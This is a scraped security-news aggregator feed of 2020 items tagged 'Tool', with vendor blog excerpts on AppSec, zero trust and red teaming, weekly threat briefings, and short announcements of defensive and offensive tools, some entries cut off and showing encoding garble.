What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2020-10-05 07:38:05 | Microsoft releases tool to update Defender inside Windows install images (lien direct) | The new tool supports installation images for Windows 10 (Enterprise, Pro, and Home editions), Windows Server 2019, and Windows Server 2016. | Tool | ||
 |
2020-10-01 14:10:28 | 96% of Organizations Use Open Source Libraries but Less Than 50% Manage Their Library Security Flaws (lien direct) |  Most modern codebases are dependent on open source libraries. In fact, a recent research report sponsored by Veracode and conducted by Enterprise Strategy Group (ESG) found that more than 96 percent of organizations use open source libraries in their codebase. But ??? shockingly ??? less than half of these organizations have invested in specific security controls to scan for open source vulnerabilities.
Why is it important to scan open source libraries?
For our State of Software Security: Open Source Edition report, we analyzed the security of open source libraries in 85,000 applications and found that 71 percent have a flaw. The most common open source flaws identified include Cross-Site Scripting, insecure deserialization, and broken access control. By not scanning open source libraries, these flaws remain vulnerable to a cyberattack. ツ?ツ?ツ?
Equifax made headlines by not scanning its open source libraries. In 2017, Equifax suffered a massive data breach from Apache Struts which compromised the data ??? including social security numbers ??? of more than 143 million Americans. Following the breach, Equifax's stock fell over 13 percent. The unfortunate reality is that if Equifax performed AppSec scans on its open source libraries and patched the vulnerability, the breach could have been avoided. ツ?
Why aren???t more organizations scanning open source libraries?
If 96 percent of organizations use open source libraries and 71 percent of applications have a third-party vulnerability, why is it that less than 50 percent of organizations scan their open source libraries? The main reason is that when application developers add third-party libraries to their codebase, they expect that library developers have scanned the code for vulnerabilities. Unfortunately, you can???t rely on library developers to keep your application safe. Approximately 42 percent of the third-party code pulled directly by an application developer has a flaw on first scan. And even if the third-party code appears to be free of flaws, more than 47 percent of third-party code has a transitive flaw that???s pulled indirectly from another library in use.
What are your options for managing library security flaws?
First off, it???s important to note that most flaws in open source libraries are easy to fix. Close to 74 percent of the flaws can be fixed with an update like a revision or patch. Even high priority flaws are easy to fix ??? close to 91 percent can be fixed with an update.
So, when it comes to managing your library security flaws, the concentration should not just be, ???How |
Data Breach Tool Vulnerability | Equifax | |
|
2020-10-01 13:00:03 | With API attacks rising, Cloudflare launches a free API security tool (lien direct) | Claudflare launches API Shield, a new service to protect web APIs against attacks. | Tool | ||
 |
2020-10-01 11:44:03 | Python programming: Microsoft\'s new tool makes app testing easier for developers (lien direct) | Playwright for Python automates end-to-end testing for web apps and works in any browser. | Tool | ||
 |
2020-10-01 11:26:19 | A Simple Guide to Threat Hunting (lien direct) | Threats are continually changing and becoming more sophisticated. Making it impossible to buy a tool that detects every potential cyberthreat. You can help protect your business by taking a proactive approach to hunting threats. According to the 2020 Verizon Data Breach report, more than 25% percent of breaches took months or longer to discover This [...] | Data Breach Tool Threat | ||
 |
2020-09-29 05:01:00 | Zero Trust Architecture explained (lien direct) | This blog was written by a third party author. With the increase in frequency, sophistication, and cost of cyberattacks, the global focus on cybersecurity is at an all-time high. However, the goalposts for those tasked with protecting businesses have shifted. Hackers have a growing number of ways they can compromise a business and are frequently looking to move laterally within an organization, using credentialed (and often elevated) access. On top of this, insider threats are on the rise where trusted users take advantage of their access for nefarious purpose. This means that the tried-and-tested concept of perimeter-based security and defenses (where anything located on the corporate network it is assumed to be trusted) is no longer enough. Security teams need to shift their thinking from the perimeter to the authentication and access of resources. This means looking at methods of both restricting access and monitoring access requests to ensure those utilizing the environment are doing so appropriately. This is where a Zero Trust Architecture comes in. What is Zero Trust Architecture? Zero Trust Architecture should be a core part of a company’s cybersecurity planning, combining identify, access policy, authentication, and more. The concept of Zero Trust is “never trust, always verify”, which effectively means assuming that all devices and users represent a potential threat and cannot be trusted until they can be properly authenticated. Once authenticated users are allowed access only to the bare minimum, they need to perform their job efficiently. Therefore, if a device (or user account) is compromised, Zero Trust aims to ensure that the damage is either mitigated (by not allowing access) or, at worst, is limited in scope. The concept of Zero Trust has been growing over the past decade; however, the challenge has been implementing it without sacrificing user experience and productivity. Zero Trust Architecture relies heavily on some critical capabilities – namely identity management, asset management, application authentication, network segmentation, and threat intelligence. The technologies needed to achieve these were once only available to larger organizations but are now readily available in the mainstream. How can an organization implement Zero Trust Architecture? Successfully implementing a Zero Trust Architecture means going beyond rolling out a series of integrated tools and technologies, which are supported by a set of operational policies and authentication requirements. This has to be a strategic initiative that supports the formation of the Zero Trust architecture outside of a tool and technologies acquisition. The latter should outline what Zero Trust will look like as it relates to authorization to specific resources both on-premises and in the cloud, as well as how Zero Trust technologies will interact with data, threat intelligence, public key infrastructure, identity management, and vulnerability management systems. Once this foundation has been established, companies can determine how further to define their Zero Trust Architecture; for example, using software-defined perimeters, micro-segmentation, by identity, or a combination therein. In terms of setting user policy, understating accountability, authority, and capability are critical to establishing the level of trust of an individual user. The implementation of a trust algorithm can involve a score-based approach, as well as contextual based or an approach involving certain criteria that must first be met. When it comes to rolling out the technology to support your Zero Trust environment, it’s advisable to run a pilot program first. This will allow you to get the kinks out, adjust KPIs and teach you how to operate in a ZTA overall with limited impact to your business. Pilot programs should focu | Tool Vulnerability Threat | ||
 |
2020-09-25 08:01:52 | FinSpy Spyware for Mac and Linux OS Targets Egyptian Organisations (lien direct) | Amnesty International today exposed details of a new surveillance campaign that targeted Egyptian civil society organizations with previously undisclosed versions of FinSpy spyware designed to target Linux and macOS systems.
Developed by a German company, FinSpy is extremely powerful spying software that is being sold as a legal law enforcement tool to governments around the world but has also |
Tool | ||
 |
2020-09-23 17:13:02 | tko-subs – Detect & Takeover Subdomains With Dead DNS Records (lien direct) |  tko-subs is a tool that helps you to detect & takeover subdomains with dead DNS records, this could be dangling CNAMEs point to hosting services or to nothing at all or NS records that are mistyped.
What does tko-subs – Detect & Takeover Subdomains With Dead DNS Records Do?
This tool allows you:
To check whether a subdomain can be taken over because it has:
a dangling CNAME pointing to a CMS provider (Heroku, Github, Shopify, Amazon S3, Amazon CloudFront, etc.) that can be taken over.
Read the rest of tko-subs – Detect & Takeover Subdomains With Dead DNS Records now! Only available at Darknet.
|
Tool | ||
|
2020-09-23 05:01:00 | What is mobile device management? MDM explained (lien direct) | This blog was written by a third party author. Not too long ago, the desktop computer was the primary computing device for enterprise employees. With the rise of mobile endpoints like smartphones, laptops and tablets, employees are connecting to corporate networks from a wide variety of places and devices. Today, especially with the popularity of the WFH (work from home) model, managing the multitude of mobile devices is more complicated than ever before. The statistics tell a sobering tale. For example, 70% of breaches originate on the endpoint, making it the number one target for attacks. Even more concerning, according to a recent study, 60% of breaches were linked to a vulnerability where a patch was available, but not applied. The moral of the story: mobile device management is critical for any corporate network. What is mobile device management? Mobile device management (MDM) is a software tool for IT departments and administrators that allows management of all mobile endpoints, including smartphones, laptops, tablets, and IoT devices. Endpoints can be owned by either the company or the employee, and the MDM solution can be hosted onsite or in the cloud. The goal of an MDM is to find the right balance between management, productivity and policy compliance. As personal devices proliferate onto enterprise networks, MDM plays a vital role in securing corporate networks while allowing employees to continue to work more efficiently. Mobile Device Management software relies on the client/server model to function. Using a management console, the server component allows IT administrators to configure and assign policies. The client component resides on each mobile device and receives whatever directives have been assigned from the management console. MDM is now a mature platform that has seen significant advances. Client-initiated updates are a thing of the past, as modern MDM software can instantly discover any new endpoint making a connection to the network. Today’s MDM is much more streamlined. Managing BYOD with MDM The line between a mobile user and an on-premise employee has blurred as almost everyone brings some type of personal device into the workplace. The BYOD (bring your own device) movement in many organizations is no longer a movement but more of a norm. The need to monitor and manage these endpoints has never been greater. While the benefits of BYOD are clear — lower equipment costs and more time available for IT personnel come to mind — if endpoints are not actively managed and monitored, the security risks are significant. Mobile device management is a critical component of any BYOD policy, as it allows the business to maintain control of their company data and how it is accessed. Tablets and smartphones can be difficult enough to manage in the BYOD era. After all, they’re arguably less secure than laptops and desktops due to a lack of pre-installed malware protection. But when IoT is added to the mix, especially if employees aren’t aware of the security threat it poses, the importance of the MDM multiplies. According to a recent Infoblox report, a staggering 80% of IT professionals surveyed discovered shadow (unreported to the IT department) IoT devices connected to their network, and 29% of them discovered more than 20. These devices could be smart TVs, kitchen devices, cameras, or personal health monitors. We’ve discussed IoT security before; by default, devices are inherently in | Malware Tool Vulnerability Threat | ||
 |
2020-09-22 17:00:37 | New tool helps companies assess why employees click on phishing emails (lien direct) | NIST's tool can help organizations improve the testing of their employees' phish-spotting prowess | Tool | ||
 |
2020-09-21 14:00:00 | A New Tool Detects Counterfeit Whiskey-Without Wasting a Drop (lien direct) | Bogus booze has been infiltrating the market, so physicists found a way to test for authenticity while keeping the precious bottles sealed. | Tool | ★★★ | |
 |
2020-09-20 09:39:26 | Security Affairs newsletter Round 282 (lien direct) | A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Gaming hardware manufacturer Razer suffered a data leak CIRWA Project tracks ransomware attacks on critical infrastructure Popular Marketing Tool exposes data of users of dating sites Staples discloses data breach […] | Ransomware Data Breach Tool | ||
|
2020-09-18 17:56:28 | How to encrypt files on your Linux servers with gocryptfs (lien direct) | Looking for an easy to use encryption tool to protect data on your Linux servers? Jack Wallen shows you how to install and use gocryptfs to serve that very purpose. | Tool | ||
 |
2020-09-15 15:00:00 | Weekly Threat Briefing: APT Group, Malware, Ransomware, and Vulnerabilities (lien direct) |
The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Conti Ransomware, Cryptominers, Emotet, Linux, US Election, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
China’s ‘Hybrid War’: Beijing’s Mass Surveillance of Australia and the World for Secrets and Scandal
(published: September 14, 2020)
A database containing 2.4 million people has been leaked from a Shenzhen company, Zhenhua Data, believed to have ties to the Chinese intelligence service. The database contains personal information on over 35,000 Australians and prominent figures, and 52,000 Americans. This includes addresses, bank information, birth dates, criminal records, job applications, psychological profiles, and social media. Politicians, lawyers, journalists, military officers, media figures, and Natalie Imbruglia are among the records of Australians contained in the database. While a lot of the information is public, there is also non-public information contributing to claims that China is developing a mass surveillance system.
Recommendation: Users should always remain vigilant about the information they are putting out into the public, and avoid posting personal or sensitive information online.
Tags: China, spying
US Criminal Court Hit by Conti Ransomware; Critical Data at Risk
(published: September 11, 2020)
The Fourth District Court of Louisiana, part of the US criminal court system, appears to have become the latest victim of the Conti ransomware. The court's website was attacked and used to steal numerous court documents related to defendants, jurors, and witnesses, and then install the Conti ransomware. Evidence of the data theft was posted to the dark web. Analysis of the malware by Emsisoft’s threat analyst, Brett Callow, indicates that the ransomware deployed in the attack was Conti, which has code similarity to another ransomware strain, Ryuk. The Conti group, believed to be behind this ransomware as a service, is sophisticated and due to the fact that they receive a large portion of the ransoms paid, they are motivated to avoid detections and continue to develop advanced attacking tools. This attack also used the Trickbot malware in its exploit chain, similar to that used by Ryuk campaigns.
Recommendation: Defense in Depth, including vulnerability remediation and scanning, monitoring, endpoint protection, backups, etc. is key to thwarting increasingly sophisticated attacks. Ransomware attacks are particularly attractive to attackers due to the fact that each successful ransomware attack allows for multiple streams of income. The attackers can not only extort a ransom to decrypt the victim's files (especially in cases where the victim finds they do not have appropriate disaster recovery plans), but they can also monetize the exfiltrated data directly and/or use the data to aid in future attacks. This technique is increasingly used in supply chain compromises to build difficult to detect spearphishing attacks.
Tags: conti, ryuk, ransomware
|
Ransomware Malware Tool Vulnerability Threat Conference | APT 35 APT 28 APT 31 | ★★★ |
|
2020-09-14 15:51:05 | 43% of Orgs Think DevOps Integration Is Critical to AppSec Success (lien direct) |  It???s no secret that the rapid speed of modern software development means an increased likelihood of risky flaws and vulnerabilities in your code. Developers are working fast to hit tight deadlines and create innovative applications, but without the right security solutions integrated into your processes, it???s easy to hit security roadblocks or let flaws slip through the cracks.
We recently dug through the ESG survey report,ツ?Modern Application Development Security, which uncovers some interesting data about the state of DevOps integration in the modern software development process. As the report states, DevOps integration is critical for improving your organization???s application security (AppSec) program, as automating and integrating solutions removes some of the manual work that can slow teams down and moves security testing into critical parts of the development process.
???DevOps integration reduces friction and shifts security further left, helping organizations identify security issues sooner,??? the report says. ???While developer education and improved tools and processes will no doubt also improve programs, automation is central to modern application development practices.???
 ???
According to the survey results, nearly half of organizations agree; 43 percent believe that DevOps integration is the most important piece of the puzzle for improving their AppSec programs. The report also outlines 10 elements of the most successful AppSec programs, and topping that list is ensuring that your AppSec controls are highly integrated into the CI/CD toolchain.
Integration challenges
For some survey respondents, that???s easier said than done. Nearly a quarter (23 percent) said that one of their top challenges with current AppSec testing solutions is that they have poor integration with existing development and DevOps tools, while 26 percent said they experience difficulty with ??? or lack of ??? integration between different AppSec vendor tools.
AppSec tool proliferation is a problem too, with a sizeable 72 percent of organizations using more than 10 tools to test the security of their code. ???Many organizations are employing so many tools that they are struggling to integrate and manage them. This all too often results in a reduction in the effectiveness of the program and directs an inordinate amount of resources to managing tools,??? they explain further.
So where should organizations like yours start? By selecting a vendor with a comprehensive offering of security solutions that integrate to help you cover those bases and consolidate solutions while reducing complexity. That???s where Veracode shines. We bring the security tests and training tools you need together into one suite so that you can consolidate and keep innovating ??? securely. And your organization can scale at a lower cost, too: our range of integrations and Veracode solutions are delivered through the cloud for less downtime and more efficiency.
Simplifying AppSec
We aim to simplify your AppSec program by combining five key analysis types in one solution, all integrated into your develo |
Tool | ||
|
2020-09-14 08:42:52 | (Déjà vu) Popular Marketing Tool exposes data of users of dating sites (lien direct) | Personal details of hundreds of users of dating sites were exposed online earlier this month. An Elasticsearch server containing personal details of hundreds of thousands of dating site users were exposed online without authentication. The unsecured database was discovered by security researchers from vpnMentor at the end of August. “vpnMentor's research team recently received a report from […] | Tool | ||
 |
2020-09-10 13:04:00 | Checklist 198: Listener Tracking in Podcasts with Rob Walch (lien direct) | Did you know that some podcasts actually track their listeners? Rob joins us today to talk about how the tracking occurs and about a new tool on the way to fight it. | Tool | ||
|
2020-09-09 21:45:16 | How to fix common Wi-Fi problems with the macOS built-in Wireless Diagnostics app (lien direct) | There's no reason to turn to third-party tools for solutions to your Wi-Fi woes. macOS has a built-in tool that can scan your wireless network and make all the recommendations that a paid tool does. | Tool | ||
|
2020-09-09 16:24:00 | Weekly Threat Briefing: Skimmer, Ransomware, APT Group, and More (lien direct) | The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Baka, DDoS, Netwalker, PyVil, Windows Defender, TA413, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
‘Baka’ Javascript Skimmer Identified
(published: September 6, 2020)
Visa have issued a security alert based on identification of a new skimmer, named “Baka”. Based on analysis by Visa Payment Fraud Disruption, the skimmer appears to be more advanced, loading dynamically and using an XOR cipher for obfuscation. The attacks behind Baka are injecting it into checkout pages using a script tag, with the skimming code downloading from the Command and Control (C2) server and executing in memory to steal customer data.
Recommendation: eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. Visa has also released best practices in the security advisory.
Tags: Baka, Javascript, Skimmer
Netwalker Ransomware Hits Argentinian Government, Demands $4 Million
(published: September 6, 2020)
The Argentinian immigration agency, Dirección Nacional de Migaciones suffered a ransomware attack that shut down border crossings. After receiving many tech support calls, the computer networks were shut down to prevent further spread of the ransomware, which led to a cecission in border crossings until systems were up again. The ransomware used in this attack is Netwalker ransomware, that left a ransom note demanding initalling $2 million, however when this wasn’t paid in the first week, the ransom increased to $4 million.
Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different mediums, with 1 off-site. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Argentina, Government, Netwalker, Ransomware
No Rest for the Wicked: Evilnum Unleashes PyVil RAT
(published: September 3, 2020)
Researchers on the Cybereason Nocturnus team have published their research tracking the threat actor group known as Evilnum, and an ongoing change in their tooling and attack procedures. This includes a new Remote Access Trojan (RAT), written in python that they have begun to use. The actor group attacks targets in the financial services sector using highly targeted spearphishing. The phishing lures leverage "Know Your Customer" (KY |
Ransomware Malware Tool Vulnerability Threat Medical | APT 38 APT 28 | ★★★★ |
|
2020-09-09 10:58:14 | Weave Scope is now being exploited in attacks against cloud environments (lien direct) | The legitimate cloud infrastructure monitoring tool has been added to attacker arsenals. | Tool | ||
|
2020-09-08 15:45:46 | How to install the oVirt virtual machine manager on CentOS 8 (lien direct) | If you're looking for a web-based virtual machine manager, oVirt might be the tool for you. Jack Wallen shows you how to install this powerful, open source solution on CentOS 8. | Tool | ||
|
2020-09-04 20:24:16 | How to access the Android Battery Usage tool (lien direct) | Not getting the most out of your Android battery life? Jack Wallen show you how you can squeeze a bit more juice from that device. | Tool | ★★ | |
 |
2020-09-04 14:26:51 | NBlog Sept 4 - standardising ISMS data interfaces (lien direct) |  We've been chatting on the ISO27k Forum lately about using various IT systems to support ISO27k ISMSs. This morning, in response to someone saying that a particular tool which had been recommended did not work for them, Simon Day made the point that "Each organisation trying to implement an ISMS will find it's own way based on their requirements."Having surveyed the market for ISMS products recently, I followed-up with my usual blurb about organisations having different information risks and business situations, hence their requirements in this area are bound to differ, and in fact vary dynamically (in part because organisations mature as they gain experience with their ISMS: their needs change). The need for flexibility is why the ISO27k standards are so vague (essentially: figure out your own requirements by identifying and evaluating your information risks using the defined governance structure - the ISMS itself), rather than explicitly demanding particular security controls (as happens with PCI-DSS). ISO27k is designed to apply to any organisation. That thought sparked a creative idea that I've been contemplating ever since: wouldn't it be wonderful if there was a standard for the data formats allowing us to migrate easily between IT systems supporting ISO27k ISMSs?I'm idly thinking about a standard file format with which to specify information risks (threats, vulnerabilities, impacts and probabilities), controls, policies, procedures, metrics, objectives etc. - maybe an XML schema with specified field names and (where applicable) enumerated lists of values.Aside from migrating between ISMS IT support systems and services, standard data formats would facilitate data sharing between application systems, services or sub-functions (e.g. for vulnerability management, incident management and information risk management), and between departments or even organisations (e.g. insurance companies, auditors and advisors and their clients and partners).Perhaps we should develop an outline specification and propose such a standard to ISO/IEC JTC1 SC 27. A New W |
Tool Vulnerability | ||
|
2020-09-04 11:31:55 | AppSec Tools Proliferation Is Driving Investments to Consolidate (lien direct) |  When it comes to application security (AppSec), it???s important to note that no one testing type can uncover every flaw. Each tool is designed with a different area of focus, along with various speeds and costs ??? so it???s necessary to employ a mix of testing types.
A good way to think about AppSec testing types is to compare them to health exams. You wouldn???t have a cholesterol test and assume your annual physical was complete. Similarly, you shouldn???t conduct a static analysis scan and assume you???ve covered all the bases.
In the chart below, you???ll notice that static analysis works on any type of application (web, desktop, mobile, etc.) and covers a broad range of programming languages. However, it can???t find business logic flaws or alert you to known vulnerabilities in open source components.
Penetration testing might look like it can uncover every vulnerability, but it too has its downsides. Penetration tests are manual, so not only are they time consuming and expensive but also the results are quickly outdated. And, since penetration testing is conducted in staging or production, it often creates unplanned work for the development team.
Most organizations know that they need to implement several testing types. In fact, a recent survey sponsored by Veracode and conducted by Enterprise Strategy Group (ESG), revealed that more than 71 percent of organizations use more than 10 different AppSec tools. But of these organizations surveyed, 84 percent answered that the number of AppSec tools they employ is posing a challenge.
ツ? ツ?
Multiple testing types are necessary for a mature AppSec program, but they can be challenging to manage.
Why do multiple testing types cause a challenge at many organizations? Because most AppSec vendors only offer one or two testing types. So if an organization chooses a vendor that only offers static analysis, and they want to add more testing types, they have to employ more vendors.
Multiple vendors can be challenging for an organization to manage because the scan metrics will appear on separate dashboards, which makes it difficult to assess risk across the enterprise. The ESG study confirms this challenge with over 40 percent of respondents citing AppSec metrics as an ongoing issue.
34 percent of ESG survey respondents plan to consolidate vendors to alleviate the burden of multiple testing types.
Finding one vendor that offers a comprehensive set of AppSec tools ??? like Veracode ??? can alleviate the burden of vendor management. Veracode offers static analysis, dynamic analysis, software composition analysis, interactive application security testing, and penetration testing which, if used together, can enable your organization to drive down risk across the entire application lifetime from development to testing to production.
Veracode Analytics provides metrics for all five offerings in one central location. Having metrics in one place allows organizations to assess the value of their scan types, pinpoint where further investments are needed, and compare the success of their program to similar organizations in the industry. Organizations can share the findings from their analytics with stakeholders or exec |
Tool | ||
|
2020-09-04 11:00:00 | Creepy \'Geofence\' Finds Anyone Who Went Near a Crime Scene (lien direct) | Police increasingly ask Google and other tech firms for data about who was where, when. Two judges ruled the investigative tool invalid in a Chicago case. | Tool | ||
|
2020-09-03 15:44:08 | Microsoft debuts deepfake detection tool (lien direct) | As the US presidential election nears, the company's new tech should also help assure people that an image or video is authentic | Tool | ||
|
2020-09-02 05:01:00 | Red Team testing explained: what is Red Teaming? (lien direct) | This blog was written by a third party author. In the world of cybersecurity preparedness, there are a variety of strategies organizations large and small can take to help protect their networks and data from cyber-attacks. One such strategy involves an organization testing its own environment for security vulnerabilities. But because security weaknesses come in different forms, it’s necessary to have a focused security team that comprehensively searches for vulnerabilities that go beyond simple risk assessments. Part of this dedicated security team can include a Red Team. What is a Red Team? Whether internal or external, Red Teams are responsible for running simulated cyberattacks on either their own organization (in the case of an internal Red Team) or other organizations (in the case of Red Team services as part of contracted external security services) to establish the effectiveness of the organization’s security programs. While Red Teams use many of the same tools and techniques used in penetration tests or “ethical hacking”, the objective of a Red Team is different. Attacks employed by Red Teams are multi-layered simulations designed to gauge how well a company’s people, networks, applications, and physical security controls can detect, alert and respond to a genuine attack. What is Red Team testing? Red Team testing is also known as an Adversary Simulation or simply Red Teaming. During Red Team testing, highly experienced security professionals take on the guise of a real attacker and attempt to breach the organization’s cyber defenses. The attack scenarios they enact are designed to exercise various attack surfaces presented by the organization and identify gaps in preventative, detective, and response related security controls. These attacks leverage a full range of tools available to the most persistent attackers—including social engineering and physical attack vectors, from careful crafted phishing emails to genuine attempts to breach onsite security and gain access to server rooms. Prior to the assessment, rules of engagement are established between the Red Team members and the smallest possible set of participants within the organization to be tested. This number will vary but is typically no more than 5 people in key positions to view the organizations detection and response activities. Based on the rules of engagement, a Red Team may target any or all of the following areas during the exercise: Technology defenses – In order to reveal potential vulnerabilities and risks within hardware and software-based systems like networks, applications, routers, switches, and appliances. Human defenses – Often the weakest link in any organization’s cyber defenses, Red Teaming will target staff, independent contractors, departments, and business partners to ensure they’re all as secure as possible. Physical defenses – Physical security around offices, warehouses, substations, data centers, and buildings are just as important as technology defenses, and as such should be stress tested against a genuine attack. Something as seemingly innocuous as holding a secure door open for someone without having them tap in can provide the gap an attacker needs to gain access to unauthorized systems. Through this process, Red Team testing helps security teams identify any loopholes or weak points that could provide opportunities for attackers (either internal or external) to gain access to a company’s systems, which could then result in a serious data breach. Most importantly, this highlights gaps in the detective and response capabilities of the organization meant to identify and counter such malicious activities on a day to day basis. Who is Red Team testing suitable for? The harsh reality of today’s | Tool Threat | ||
 |
2020-09-01 19:43:43 | Threat Hunting: Velociraptor for Endpoint Monitoring (lien direct) | Velociraptor is a tool for collecting host-based state information using Velocidex Query Language (VQL) queries. To learn more about Velociraptor, read the documentation on https://www.velocidex.com/docs Table of Content Introduction to Velociraptor Architecture What is VQL Prerequisites Velociraptor Environment Velociraptor installation Addition of host forensics investigation / Threat Hunting Introduction to Velociraptor Velociraptor is a free... Continue reading → | Tool Threat | ||
|
2020-09-01 10:00:23 | Microsoft Teams: This ambitious low-code tool will change how you use data and share applications (lien direct) | Microsoft's Project Oakdale plan for data applications inside Teams is starting to shape up. | Tool | ||
|
2020-08-30 11:29:55 | Security Affairs newsletter Round 279 (lien direct) | A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. A Google Drive weakness could allow attackers to serve malware Adobe released open- source tool Stringlifier to identify randomly generated strings Canadian delivery company Canpar Express suffered a ransomware attack […] | Ransomware Malware Tool | ||
 |
2020-08-28 15:14:38 | How to choose a SAST tool to secure your development? (lien direct) | When it comes to secure development, how do you integrate a code scanner into the process, what are the traps and pitfalls? Аll developers face static analysis (static application security testing or SAST, which means code analysis without execution). However, we still rarely see full-fledged SAST solutions in use capable of detecting advanced vulnerabilities. Well-known […] | Tool | ||
|
2020-08-28 12:00:00 | What Virtual Reality for Flies Teaches Us About Human Vision (lien direct) | Optical illusions can be a useful tool for studying how we see stuff, but it's hard to uncover just how they work. Unless, that is, you show them to flies. | Tool | ||
 |
2020-08-27 15:55:00 | Old Malware Tool Acquires New Tricks (lien direct) | Latest version of Qbot has acquired a new feature for collecting email threads from Outlook clients. | Malware Tool | ★★ | |
|
2020-08-23 06:56:08 | Adobe released open- source tool Stringlifier to identify randomly generated strings (lien direct) | Adobe has released an open-source tool, dubbed Stringlifier, that allows users to identify randomly generated strings in any plain text, it can be used to sanitize logs. Adobe has released an open-source tool, dubbed Stringlifier, which was designed to identify randomly generated strings in any plain text. The Stringlifier tool was written in Python and […] | Tool | ||
|
2020-08-19 11:00:00 | How to check the effectiveness of phishing (lien direct) | This blog was written by an independent guest blogger. You can install the latest generation of security software to protect against evil hackers, but what is the use of it if your employees continue to follow phishing links? Several security companies conduct social and technical research of real-life phishing attacks aimed at different businesses and are impressed with the scale of the problem. The purpose of such studies is not only to understand how hackers deceive the staff and which hooks do they use but also to draw the right conclusions about what type of security awareness training to use and how often it is needed. One of the security companies I work with sent more than 15 thousand “phishing” emails to corporate mailboxes in 2019. Let’s see their results. What is inside the phishing email? According to statistics, last year, phishing became the most popular tool for penetrating the companies’ infrastructure. Attackers used this method in 70% of attacks. The second place took RDP hacking. Globally, all phishing emails are trying to provoke a user to one of two actions - click on a phishing link or open a malicious attachment. During pentest projects, depending on the final task, researchers send employees several letters with a link to a web form for entering account credentials or Microsoft Office documents with malicious macros. Most messages use harmless files that allow researchers to track only the fact of following the links or opening attachments. But sometimes, researchers send documents that contain macros that allow them to get remote access to workstations. Using such messages, researchers can check not only the vigilance of employees but also the reliability of the means of protection. The main task of each such project is to make the “phishing” email to look as realistic as possible. Researchers try to craft letters and build the overall logic of the attack in the way a real cybercriminal would do it, assuming, for example, that the goal of the attacker is to gain access to the correspondence of the company’s top management personnel. Usually, attackers start with harvesting information about the company using open sources. In one of the cases, our “attackers” discovered Outlook Web App, as well as news about the presence of a 0-day vulnerability in a browser used by this company. An attacker, preparing for an attack, considers all possible ways to achieve the desired goal and selects the most suitable and effective way. What was found? From our experience, users are more likely to open file attachments rather than provide their data via a web form. In each of the companies that were tested, several employees open attachments without any delay. Among email topics used, corporate bonus programs (employee discounts, corporate offers from partner companies) turned out to be the most effective. About 33% of addressees reacted to such letters. The second place took letters that asked employees to read the new corporate rules or other important corporate documents. Especially successful are attacks that have to do with current events. For example, in December, it is highly effective to offer the victims to check the work schedule for the upcoming holidays or find out about discounts on holiday events. This spring, the hottest topic, of course, was COVID-19. 15% of the | Malware Tool Studies | ||
|
2020-08-18 20:00:52 | 9th September – Faster Detection and Response with MITRE ATT&CK (lien direct) | The MITRE ATT&CK framework is a tool to help security teams create a more effective security defense. ATT&CK uses open standards and is essentially a database of documented threat behaviors. Using the ATT&CK framework, analysts can track threat actor behavior to speed up incident response and investigation. When combined with a SIEM or UEBA solution, [...] | Tool Threat | ★★ | |
|
2020-08-18 19:44:03 | XCSSET: New Mac malware infects Xcode projects (lien direct) | Security researchers have discovered an interesting new variety of macOS malware that spreads by attacking Xcode projects. It's called XCSSET, and in this article, we'll tell you what you need to know about this unusual threat in order to stay safe. What is XCSSET? XCSSET is a suite of malicious components that spreads through infected Xcode projects. Xcode is a tool used by app developers to write software for Apple platforms. An Xcode ... | Malware Tool Threat | ||
|
2020-08-17 08:03:23 | Arcane – Tool To Backdoor iOS Packages (iPhone ARM) (lien direct) |  Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories.
It was created to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane Tool To Backdoor iOS Package Works
It's possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files.
Read the rest of Arcane – Tool To Backdoor iOS Packages (iPhone ARM) now! Only available at Darknet.
|
Tool | ||
|
2020-08-15 13:00:00 | The NSA and FBI Expose Fancy Bear\'s Sneaky Hacking Tool (lien direct) | Plus: TikTok tracking, Russian SIMs, and more of this week's top security news. | Tool | APT 28 | |
|
2020-08-14 16:25:00 | DHS CISA Warns of Phishing Emails Rigged with KONNI Malware (lien direct) | Konni is a remote administration tool cyberattackers use to steal files, capture keystrokes, take screenshots, and execute malicious code. | Malware Tool | ||
|
2020-08-13 21:47:11 | Forensic Investigation: Autopsy Forensic Browser in Linux (lien direct) | Introduction Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It is an open-source tool for digital forensics which was developed by Basis Technology. This tool is free to use and is very efficient in nature investigation of hard drives. It also consists of features like multi-user... Continue reading → | Tool | ||
|
2020-08-13 11:00:00 | AlienApps and plug-ins combined into one framework (lien direct) |
The heart of any detection and response solution is the ability to collect events from the environment, perform corrective response actions, and integrate with customer workflows. Today, we’re proud to announce the launch of a complete redesign of the user interface for these third party integrations. We’ve updated our design to make it easier for customers to find the integrations they need, centralize the configuration of them, and identify any operational problems with the integrations.
What exactly have we done?
Previously, we’ve had two types of integrations with other security and IT products - plug-ins and AlienApps. Plug-ins were basic data collection tools used to collect, normalize, and enhance event logs from your environment. AlienApps performed a variety of functions including collection of event data via API polling, requesting third party response actions such as blocking dangerous internet destinations, and sending notifications to ticketing systems such as Jira or ServiceNow®.
